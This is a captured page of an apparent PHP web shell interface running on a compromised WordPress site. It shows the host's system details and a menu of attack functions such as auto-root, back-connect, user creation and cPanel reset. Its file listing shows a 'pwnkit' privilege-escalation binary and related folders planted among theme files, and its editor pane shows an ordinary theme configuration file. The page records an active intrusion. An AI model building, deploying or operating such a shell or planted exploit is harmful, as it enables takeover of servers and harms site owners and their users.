Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
www /
wp-content /
themes /
imroz /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
customizer
[ DIR ]
drwxr-xr-x
helper
[ DIR ]
drwxr-xr-x
lab
[ DIR ]
drwxr-xr-x
options
[ DIR ]
drwxr-xr-x
underscore
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
comment-form.php
6.49
KB
-rw-r--r--
comment-nav.php
585
B
-rw-r--r--
demo-import-config.php
22.07
KB
-rw-r--r--
global-functions.php
4.89
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
register-custom-fonts.php
1.14
KB
-rw-r--r--
scripts.php
4.5
KB
-rw-r--r--
tgm-config.php
2.29
KB
-rw-r--r--
widget-area-register.php
2.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tgm-config.php
<?php /** * @author Rainbow-Themes * @since 1.0 * @version 1.0 * @package imroz */ class TGM_Config { public $prefix = RBT_THEME_PREFIX; public $path = "https://rainbowit.net/themes/imroz/demo/plugins/"; public function __construct() { add_action( 'tgmpa_register', array( $this, 'rbt_tgn_plugins' ) ); } public function rbt_tgn_plugins(){ $plugins = array( array( 'name' => esc_html__('Imroz Core','imroz'), 'slug' => 'imroz-core', 'source' => 'imroz-core.1.3.zip', 'required' => true, 'version' => '1.3' ), array( 'name' => esc_html__('Advanced Custom Fields Pro', 'imroz'), 'slug' => 'advanced-custom-fields-pro', 'source' => 'advanced-custom-fields-pro.zip', 'required' => true, ), // Repository array( 'name' => esc_html__('Redux Framework','imroz'), 'slug' => 'redux-framework', 'required' => true, ), array( 'name' => esc_html__('Elementor Page Builder','imroz'), 'slug' => 'elementor', 'required' => true, ), array( 'name' => esc_html__('Contact Form 7','imroz'), 'slug' => 'contact-form-7', 'required' => false, ), array( 'name' => esc_html__('One Click Demo', 'imroz'), 'slug' => 'one-click-demo-import', 'required' => true, ) ); $config = array( 'id' => $this->prefix, // Unique ID for hashing notices for multiple instances of TGMPA. 'default_path' => $this->path, // Default absolute path to bundled plugins. 'menu' => $this->prefix . '-install-plugins', // Menu slug. 'has_notices' => true, // Show admin notices or not. 'dismissable' => true, // If false, a user cannot dismiss the nag message. 'dismiss_msg' => '', // If 'dismissable' is false, this message will be output at top of nag. 'is_automatic' => false, // Automatically activate plugins after installation or not. 'message' => '', // Message to output right before the plugins table. ); tgmpa( $plugins, $config ); } } new TGM_Config;
Close